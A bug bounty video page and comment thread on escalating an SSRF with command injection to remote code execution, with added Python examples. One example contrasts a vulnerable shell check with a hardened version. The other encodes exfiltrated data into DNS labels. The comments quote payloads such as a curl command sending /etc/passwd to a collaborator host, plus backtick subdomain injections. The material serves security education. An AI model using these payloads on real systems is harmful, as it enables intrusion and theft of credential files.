From a lame Server-Side Request Forgery to Remote Code Execution

  • Published on 9 Aug 2024
  • Welcome to this bug bounty write-up, where I show you how I found a Server-Side Request Forgery (SSRF) vulnerability. Then I explain how I escalated it to Remote Code Execution (RCE). Finally, you see how it is possible to gain a full SSH shell on the vulnerable server.
    Read more on thehackerish.com/bug-bounty-w...
    📙 Become a successful bug bounty hunter: thehackerish.com/a-bug-bounty...
    🆓 Download your FREE Web hacking LAB and start hacking NOW: thehackerish.com/owasp-top-10...
    🌐 Read more on the blog: thehackerish.com
    💪🏻 Support this work: thehackerish.com/how-to-support
    - Facebook Page: / thehackerish
    - Follow us on Twitter: / thehackerish
    - Listen on Anchor: anchor.fm/thehackerish
    - Listen on Spotify: open.spotify.com/show/4Ht8jEb...
    - Listen on Google Podcasts: podcasts.google.com/?feed=aHR...
    Chaining vulnerabilities can be devastating. In this bug bounty write-up, you learn how to combine SSRF and command injection to achieve Remote Code Execution on the vulnerable server. You also learn how to gain a stable shell by leveraging the exposed SSH server. Finally, you learn that demonstrating a clear impact matters if you want to receive the highest bounty.
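    The pattern behind the write-up, as an added example that is not the author's code: a "check this host" feature splices a user-supplied hostname into a shell command line (the video's backend ran ssh/curl), so backtick and `$(...)` command substitution in the subdomain part runs attacker commands on the server. The hardened variant validates the hostname against the RFC 1123 grammar and passes it as its own argv element with no shell in between. To run offline, `echo` stands in for the real network tool; `attacker.example` and `api.example.com` are placeholders.

```python
"""
Added example, not the write-up author's code. Models a reachability check
where the hostname ends up inside a /bin/sh command line, and its fix.
`echo` is an offline stand-in for the ssh/curl binary the real backend ran.
"""
import re
import subprocess

TOOL = "echo"  # placeholder for the network tool the backend really invokes


def vulnerable_check(hostname: str) -> str:
    """Vulnerable: the hostname becomes part of a string parsed by /bin/sh,
    so `cmd` and $(cmd) inside it are executed before TOOL ever runs."""
    cmd = f"{TOOL} connecting to {hostname}"
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout.strip()


# RFC 1123 hostname: labels of letters, digits and '-', no leading or trailing
# '-', 1-63 characters each, 253 characters overall. This rejects every shell
# metacharacter (` $ ( ) ; | & space) and a leading '-', which would otherwise
# let the value be parsed as an option by ssh or curl.
_LABEL = r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
_HOSTNAME_RE = re.compile(rf"{_LABEL}(?:\.{_LABEL})*", re.IGNORECASE)


def is_valid_hostname(hostname: str) -> bool:
    return len(hostname) <= 253 and _HOSTNAME_RE.fullmatch(hostname) is not None


def hardened_check(hostname: str) -> str:
    """Hardened: validate first, then exec TOOL directly with an argv list.
    Even a metacharacter that slipped past validation would reach TOOL as a
    literal argument, never as shell syntax."""
    if not is_valid_hostname(hostname):
        raise ValueError(f"rejected hostname: {hostname!r}")
    proc = subprocess.run(
        [TOOL, "connecting", "to", hostname],
        capture_output=True, text=True, check=True,
    )
    return proc.stdout.strip()


# Injection payloads in the shape discussed in the comments (constructed).
PAYLOADS = [
    "`echo pwned`.attacker.example",    # backtick substitution in the subdomain
    "$(echo pwned).attacker.example",   # same idea when backticks are filtered
    "attacker.example; echo pwned",     # plain command chaining
]

if __name__ == "__main__":
    for payload in PAYLOADS:
        print(f"{payload!r:38} shell=True ran -> {vulnerable_check(payload)!r}")
        try:
            hardened_check(payload)
        except ValueError as exc:
            print(f"{'':38} hardened        -> {exc}")
    print("hardened, valid input ->", hardened_check("api.example.com"))
```

    The syntactic check only closes the command injection; it happily accepts `127.0.0.1` or an internal name, so the SSRF half of the bug (reaching hosts the caller should not reach) still needs an allow-list or egress policy on top of it.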

Comments • 94

  • @SB-rf2ye
    @SB-rf2ye 3 years ago +1

    That's effin' diabolical mate. Great explanation! Really enjoying your channel.

  • @arpeetrathi
    @arpeetrathi 4 years ago

    Was simple, but never thought about it. Thanks for it!

  • @goodboy8833
    @goodboy8833 4 years ago

    I love this channel, he does very elegant, explicit demonstrations. Hope you post more videos on SSRF and XSS.

  • @arjunpeter9614
    @arjunpeter9614 3 years ago

    Marvelous explanation 👍 keep doing it, bro

  • @msalih
    @msalih 1 year ago

    Hi! Thanks for the awesome content.

  • @emilioastier
    @emilioastier 3 years ago

    Great video. Thank you very much for the content and the teaching.

    • @thehackerish
      @thehackerish  3 years ago

      Thank you for your kind feedback. Enjoy!

  • @01zoso
    @01zoso 4 years ago +1

    Great video, thanks for sharing 👍

  • @KushChoudhary
    @KushChoudhary 3 years ago

    Super amazing! Thank you! :)

  • @dhilipsanjay
    @dhilipsanjay 4 years ago

    Great explanation!!

  • @sushantdhopat
    @sushantdhopat 3 years ago +1

    Learned a new methodology, thanks for the amazing video 😍

  • @rohanrajgupta3614
    @rohanrajgupta3614 3 years ago

    You are amazing man. Love yaa ❣️

  • @densi97
    @densi97 4 years ago +2

    Great video! If you already have access to your target, do you also look for privilege escalation to receive more bounties, or do you think your work is done after initial access?

    • @thehackerish
      @thehackerish  4 years ago +3

      Great question. I reported it and asked them if they want me to escalate my privileges, but they preferred to quickly fix it.

    • @densi97
      @densi97 4 years ago

      @@thehackerish thanks for the quick reply. Good idea to first ask for permission :)

    • @francisdonald4298
      @francisdonald4298 2 years ago

      @@thehackerish Hey bro, your work is good, you help us learn, but can you please show an example of the request and how you add the command injection, since I find it hard? Do you put the commands then a dot and burpcollaborator, without quotes, to the Burp address???

  • @mcgyver5
    @mcgyver5 3 years ago +1

    Great find! I've subscribed. The slide at 6:09 has "mycollab-server" twice: `curl -F '@/etc/passwd' mycollab-server`.mycollab-server. Do I understand correctly that you need to have it twice so that the .mycollab-server string at the end conforms it to what looks like a valid host name? If this is the case, will your server receive two requests out of that one payload? And could the second "mycollab-server" just as well be example.com or anything else?

    • @thehackerish
      @thehackerish  3 years ago +1

      You have a sharp eye, Great question!
      Since the content of passwd does not comply with a hostname, the request will not be performed. However, the first one will exfiltrate the passwd to your server, which could be anything else as long as it is reachable from the internet.
      If you want to receive the content in the subdomain part, you could base64 encode the file content, or a part of it.

    • @mcgyver5
      @mcgyver5 3 years ago

      @@thehackerish I get it! Thanks for your fast reply here, almost a year after you posted it.
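    The encoding step the reply above mentions, as an added example that is not part of the thread or the author's material. Raw file contents are not a valid hostname, and plain base64 is a poor fit too: `+`, `/` and `=` are not hostname characters, and DNS is case-insensitive, so a listener may see lowercased labels. Base32 (lowercased, padding stripped) survives both, and the data is split into 63-character labels and queries of at most 253 characters so resolvers will actually forward them. The listener side reassembles the queries in any order. `oast.example` is a placeholder for the collaborator domain.

```python
"""
Added example, not from the video or its author: hostname-safe encoding of
exfiltrated data into DNS labels (what a collaborator listener has to decode).
"""
import base64

MAX_LABEL = 63   # RFC 1035 label limit
MAX_NAME = 253   # practical limit for a textual hostname


def encode_for_dns(data: bytes, domain: str) -> list[str]:
    """Return the DNS names a payload would resolve, in order.
    Each name is <seq>.<label>...<label>.<domain>; the sequence label lets
    the listener reorder queries that arrive out of order."""
    text = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    names, seq, pos = [], 0, 0
    while pos < len(text):
        seq_label = str(seq)
        # room left after "<seq>." and ".<domain>"; each label costs 63 + a dot
        budget = MAX_NAME - len(seq_label) - 1 - len(domain) - 1
        labels_per_query = max(1, budget // (MAX_LABEL + 1))
        chunk = text[pos:pos + labels_per_query * MAX_LABEL]
        labels = [chunk[i:i + MAX_LABEL] for i in range(0, len(chunk), MAX_LABEL)]
        names.append(".".join([seq_label, *labels, domain]))
        pos += len(chunk)
        seq += 1
    return names


def decode_from_dns(names: list[str], domain: str) -> bytes:
    """Reassemble data from observed query names (any order, any case).
    Names that do not end in the collaborator domain are ignored."""
    suffix = "." + domain.lower()
    pieces = {}
    for name in names:
        name = name.lower().rstrip(".")
        if not name.endswith(suffix):
            continue
        seq, _, body = name[:-len(suffix)].partition(".")
        if not seq.isdigit():
            continue
        pieces[int(seq)] = body.replace(".", "")
    text = "".join(pieces[k] for k in sorted(pieces)).upper()
    text += "=" * (-len(text) % 8)   # restore the padding stripped on encode
    return base64.b32decode(text)


# Constructed sample standing in for /etc/passwd; not taken from any real host.
SAMPLE = (
    b"root:x:0:0:root:/root:/bin/bash\n"
    b"www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
) * 3

if __name__ == "__main__":
    queries = encode_for_dns(SAMPLE, "oast.example")
    for q in queries:
        print(len(q), q)
    assert decode_from_dns(reversed(queries), "oast.example") == SAMPLE
    print("round trip ok across", len(queries), "queries")
```

    On the target side the injected command has to produce the same encoding; with GNU coreutils that is `base32 -w0` piped through `tr` and a label splitter, which is an assumption about the target's toolset rather than something the video shows.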

  • @hdphoenix29
    @hdphoenix29 3 years ago

    Great finding! Congrats

  • @0x_hacks
    @0x_hacks 5 months ago

    Great

  • @charchitsharma4559
    @charchitsharma4559 4 years ago +7

    That's a great find. Learned something new today.✌️

    • @thehackerish
      @thehackerish  4 years ago +1

      Happy to hear that!

    • @francisdonald4298
      @francisdonald4298 2 years ago

      @@thehackerish Example: where do you put the commands, outside the quotes of the server address or...?

  • @adamproof3440
    @adamproof3440 4 years ago +1

    This is stunning :o
    Were the payloads shown in the video the ones used, or did you just write them for explanation?? If not, please share them with resources, and thanks a lot

    • @thehackerish
      @thehackerish  4 years ago +2

      The injection was the same. I just replaced the long collaborator URL with a short one for visual purposes.

    • @adamproof3440
      @adamproof3440 4 years ago +1

      @@thehackerish Wow, that's really cool. Thanks for your replies and the (very) awesome content :)

    • @thehackerish
      @thehackerish  4 years ago +1

      @@adamproof3440 My pleasure! Thanks for your kind comment!

  • @Free.Education786
    @Free.Education786 3 years ago +1

    Thank you brother. You and your channel are the world's best channel that teaches noobs from 0 2 h3r0. Love U Respect U Salute U 🤝❤💙💚💐👍

    • @thehackerish
      @thehackerish  3 years ago

      Oh! What a kind comment! I am humbled, Enjoy!!!

  • @e1Pr0f3ss0r
    @e1Pr0f3ss0r 3 years ago

    Great explanation... please include screenshots for this type of content

    • @thehackerish
      @thehackerish  3 years ago

      It's meant to be a sleep story ;) Just kidding.

  • @neetech3716
    @neetech3716 4 years ago +1

    Wow, great stuff 👍👍

  • @guilhemrioux2275
    @guilhemrioux2275 3 years ago

    Hey, nice video! I'm wondering, if you had entered 'domain.com; whoami' for the command injection part, it would have worked too, right? Or did they sanitize input weirdly? Thanks

    • @thehackerish
      @thehackerish  3 years ago

      I think it would work. Actually, I might have used it to chain multiple commands, I don't remember exactly though.

  • @ashisbanerjee4584
    @ashisbanerjee4584 4 years ago +1

    Really mindblowing, owwssaaammmmm

  • @astitvavarma1079
    @astitvavarma1079 3 years ago

    Really interesting video

  • @chaitanyacse3332
    @chaitanyacse3332 4 years ago

    Loved it! Thanks 🤘

    • @thehackerish
      @thehackerish  4 years ago

    • @chaitanyacse3332
      @chaitanyacse3332 4 years ago

      @@thehackerish What if the input accepts anything only after a prefix? I mean, if not, it throws an error. Any bypass for exfiltrating metadata? (#blindssrf)🙂

    • @thehackerish
      @thehackerish  4 years ago

      @@chaitanyacse3332 In this case you can still do `inject here`.collaborator..., since this story is basically a command injection.

    • @chaitanyacse3332
      @chaitanyacse3332 4 years ago

      @@thehackerish Tried the same too, but it's not accepting these `` quotes. Any other bypasses 😉

  • @zacwesleybrown
    @zacwesleybrown 3 years ago +2

    Isn't this more similar to just plain command injection? I get that it was making requests to a server, but SSRF usually accesses internal services, e.g. a Redis database, which I'm sure you could have done, but injecting a command into what I assume is them running a curl command on the backend seems more similar to just plain old command injection. This isn't really a usual scenario that you would encounter.

    • @thehackerish
      @thehackerish  3 years ago

      Yeah, I agree on the command injection point, but the first impression you get is that it is an SSRF. However, you'd be surprised how careless devs can be, especially with deadlines and complicated architectures, so I wouldn't rule this technique out of my daily tests :)

  • @MrDarkeul
    @MrDarkeul 3 years ago

    I don't understand why the server executes the command when you put ` in the URL. Is it standard? Thanks in advance

    • @thehackerish
      @thehackerish  3 years ago

      It's one of the ways to execute commands in Linux.

  • @Tchatarero36
    @Tchatarero36 1 year ago

    Best Hacker ...

  • @kaeyasstudio985
    @kaeyasstudio985 3 years ago

    SSTI - RCE tutorial :)

  • @KINGSTARR786
    @KINGSTARR786 3 years ago

    `command`.collaborator.url >>>> URL NOT VALID ERROR😒

  • @antimatter6728
    @antimatter6728 3 years ago

    Sir, can you tell me how you knew that your command would work if you put it in the subdomain part?

    • @thehackerish
      @thehackerish  3 years ago +2

      I didn't! Hacking is all trial and error, reflex from experience, and some luck as well :) Just keep reading blogs, and learning new things.

    • @antimatter6728
      @antimatter6728 3 years ago

      @@thehackerish Can I know the name of the exploit? I'm interested in reading about it

    • @thehackerish
      @thehackerish  3 years ago

      @@antimatter6728 You mean CVE? I haven't filed one. But it's a command injection / SSRF vulnerability.

  • @AdityaFingerstyle
    @AdityaFingerstyle 4 years ago

    So presumably, the hostname you provided was run with a shell command, something like curl.
    Why would they choose to do that instead of making the request within the program (like with Axios if they're using a Node backend)?

    • @thehackerish
      @thehackerish  4 years ago

      Good question! They were not using any framework, and the dev made the mistake of trusting the hostname during an ssh command.

  • @souhaillepacifique7572
    @souhaillepacifique7572 4 years ago +2

    Thank you so much bro ❤❤

  • @tanercoder1915
    @tanercoder1915 4 years ago +3

    Practical part for this vuln using your lab setup? wink-wink :D

  • @jitusaini6896
    @jitusaini6896 3 years ago

    Can you upload a practical video on it???

    • @thehackerish
      @thehackerish  3 years ago

      When I have time, I can prepare a lab for it.

    • @jitusaini6896
      @jitusaini6896 3 years ago

      Thank you

  • @SumherShankal
    @SumherShankal 3 years ago

    Nice work
    Note:
    `pwd`.mycollaborator-url
    will be needed to locate the user's home folder 📁 path 🤔

    • @thehackerish
      @thehackerish  3 years ago +1

      As it was a service, that didn't show /home/xxx, but a nice idea as well.

  • @bigboss_6055
    @bigboss_6055 2 years ago

    Brother, your teaching is nice. But teach with some examples of a site or with a vulnerable site, so we can understand clearly 🤝

    • @thehackerish
      @thehackerish  2 years ago

      Head over to the other playlists (web hacking training and live hacking sessions)

  • @sontapaa11jokulainen94
    @sontapaa11jokulainen94 3 years ago

    subbed.

  • @adtiyamuhammadakbar2711
    @adtiyamuhammadakbar2711 4 years ago +1

    I don't understand how hackers can think of a payload like `command`.collaborator.url
    Do we really need so much creativity to be a hacker?

    • @thehackerish
      @thehackerish  4 years ago

      Think like a developer :) You can also build some software to get used to it!

    • @adtiyamuhammadakbar2711
      @adtiyamuhammadakbar2711 4 years ago

      @@thehackerish I don't know how to do that, I'm completely lost along the way

    • @thehackerish
      @thehackerish  4 years ago

      @@adtiyamuhammadakbar2711 There are many videos teaching how to build a web application :)

  • @fahadfaisal2383
    @fahadfaisal2383 2 years ago

    How much bounty did you get for this?

    • @thehackerish
      @thehackerish  2 years ago

      It says it in the title. 4k

    • @fahadfaisal2383
      @fahadfaisal2383 2 years ago

      @@thehackerish Sorry bro, I didn't notice that!

  • @Free.Education786
    @Free.Education786 3 years ago +1

    Please share how to use ACUNETIX results to exploit found vulnerabilities like SQLi, XSS, XSRF, LFI, RFI etc... bypassing WAF, IDS, IPS, hash recognition, hash cracking, finding hidden admin panels, bypassing admin panels or cPanels, uploading a shell, remote code execution (RCE), rooting the web server, gaining root privilege, mass defacement, maintaining a backdoor, etc...

    • @thehackerish
      @thehackerish  3 years ago +1

      Would love to, but I am not familiar with the Acunetix scanner. It should be similar to Burp Suite Pro, I guess.

    • @Free.Education786
      @Free.Education786 3 years ago +1

      @@thehackerish Yes exactly... no problem at all brother... teach us with any available tool or script as per your convenience... you are excellent, but I am very weak in the website hacking and website bug bounty hunting field, as most YouTube videos are just basic... not practical and easy to understand.... You are the best teacher... May God bless you for your efforts and help 🤝❤💙💚🌹💐👍

  • @laggybot1327
    @laggybot1327 3 years ago

    `hi`

  • @anik6393
    @anik6393 3 years ago

    Want to be an ethical hacker? Then enroll with thehackerish ❤️